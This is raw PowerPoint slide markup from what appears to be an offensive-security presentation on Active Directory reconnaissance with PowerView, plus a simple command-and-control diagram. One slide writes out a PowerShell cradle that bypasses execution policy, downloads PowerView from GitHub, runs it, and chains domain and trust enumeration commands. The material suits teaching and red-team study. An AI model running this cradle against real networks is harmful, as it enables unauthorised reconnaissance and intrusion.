              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/master/Recon/PowerView.ps1'); Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05606CD-904D-4AD5-8543-725FDB78CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672668" y="1772114"/>
            <a:ext cx="7401189" cy="4813243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDD8DF-3CEE-4B1D-B853-DF3B0E2236AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11182526" y="6306304"/>
            <a:ext cx="891331" cy="25167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2911764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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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Network Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> ~ Chaining commands together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118142" y="1772115"/>
            <a:ext cx="4554525" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/master/Recon/PowerView.ps1'); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05606CD-904D-4AD5-8543-725FDB78CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672668" y="1772114"/>
            <a:ext cx="7401189" cy="4813243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDD8DF-3CEE-4B1D-B853-DF3B0E2236AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11182526" y="6306304"/>
            <a:ext cx="891331" cy="25167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Arrow: Left 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785D76FD-6DF8-4A3A-8B5A-CB13A47F0C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920992" y="2479677"/>
            <a:ext cx="5696702" cy="1898646"/>
          </a:xfrm>
          <a:prstGeom prst="lef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3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cradle pulls in PS1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26506492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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command &amp; Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Simple Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2F70FD-D8F7-4E32-8150-5383EF3175F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A2AC06-47C4-4E25-AE97-8EBDFDC1A6D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463890" y="1835689"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33555083-91A0-41AF-BB24-C4C19706640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126532" y="3213372"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Cloud 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13E2599-9525-4EAF-8AF4-A1118E93EA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613864" y="3000414"/>
            <a:ext cx="2596796" cy="1758017"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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Graphic 16" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7CC9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45055" y="3492004"/>
            <a:ext cx="1038046" cy="1140710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66ED1E48-D78D-423A-B918-6E5B7DD2C170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7387552" y="3637460"/>
            <a:ext cx="1362974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="137877" y="4448047"/>
            <a:ext cx="1983886" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F672EC2-D6D5-42CA-B4E2-A458A4A2E67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2580953" y="2985141"/>
            <a:ext cx="1687697" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>C2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66DE040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10070237" y="4340326"/>
            <a:ext cx="1983886" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2AE1CDE-1653-4E16-BBC1-EF98913611BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1582272" y="2609757"/>
            <a:ext cx="872771" cy="1212369"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="none"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512542B1-4F87-4D5B-B875-7F95D94A2EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3813769" y="2510629"/>
            <a:ext cx="3092485" cy="888130"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437CDFCD-726B-4F1C-B6BF-6314912BDF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="1"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9208496" y="3879423"/>
            <a:ext cx="918036" cy="8889"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{054D947B-2C1C-422C-9FBA-731D38F90A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18299488">
            <a:off x="1595632" y="2866214"/>
            <a:ext cx="679548" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
